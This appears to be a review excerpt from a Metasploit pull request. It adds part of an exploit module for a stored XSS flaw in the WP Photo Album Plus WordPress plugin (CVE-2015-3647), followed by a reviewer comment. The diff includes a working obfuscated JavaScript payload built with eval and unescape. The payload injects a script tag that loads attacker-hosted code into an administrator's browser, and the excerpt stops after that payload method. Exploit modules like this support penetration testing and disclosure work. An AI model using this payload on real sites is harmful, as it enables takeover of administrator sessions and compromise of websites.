modules/exploits/unix/webapp/wp_photo_album_plus_stored_xss.rb

```diff
@@ -0,0 +1,147 @@
+##
+# This module requires Metasploit: http://www.metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/zip'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'WP Photo Album Plus 6.1.2 Stored XSS',
+      'Description'     => %q(
+        The vulnerability exists due to the absence of filtration of user-supplied
+        input passed via the "comname" and "comemail" HTTP POST parameters to
+        "/wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php" script when
+        posting a comment.
+
+        A remote attacker can post a specially crafted message containing malicious
+        HTML or script code and execute it in administrator's browser in context of
+        the vulnerable website, when administrator views images or comments in
+        administrative interface.
+      ),
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'High-Tech Bridge Security Research Lab',   # Discovery and disclosure
+          'Rob Carr <rob[at]rastating.com>'           # Metasploit module
+        ],
+      'References'      =>
+        [
+          ['CVE', '2015-3647'],
+          ['WPVDB', '7996'],
+          ['URL', 'https://www.htbridge.com/advisory/HTB23257']
+        ],
+      'DisclosureDate'  => 'May 20 2015',
+      'Platform'        => 'php',
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [['WordPress', {}]],
+      'DefaultTarget'   => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('LHOST',  [true, 'The host address to access via the stored XSS', '']),
+        OptString.new('URIPATH', [false, 'The URI to use for this exploit', ''])
+      ], self.class)
+  end
+
+  def script
+    # Due to WordPress escaping the quotation marks, the script must be escaped and stored
+    # as a regular expression, and then executed using eval after being unescaped. The
+    # forward slashes of the URL also have to be individually encoded using encodeURIComponent()
+    # as we can't simply escape them with a back slash, or the backslash will appear in the
+    # string that we unescape and execute.
+
+    # Unescaped script: var a = document.createElement("script");a.setAttribute("src", decodeURIComponent("http%3A%2F%2F#{datastore['LHOST']}%3A#{datastore['SRVPORT']}%2F#{datastore['URIPATH']}"));document.head.appendChild(a);
+    "eval(unescape(/var%20a%20%3D%20document.createElement%28%22script%22%29%3Ba.setAttribute%28%22src%22%2C%20decodeURIComponent%28%22http%253A%252F%252F#{datastore['LHOST']}%253A#{datastore['SRVPORT']}%252F#{datastore['URIPATH']}%22%29%29%3Bdocument.head.appendChild%28a%29%3B/.source))"
```

Comment:
@FireFart - sounds like a good idea to me, it will definitely improve maintainability, I'll give it a shot!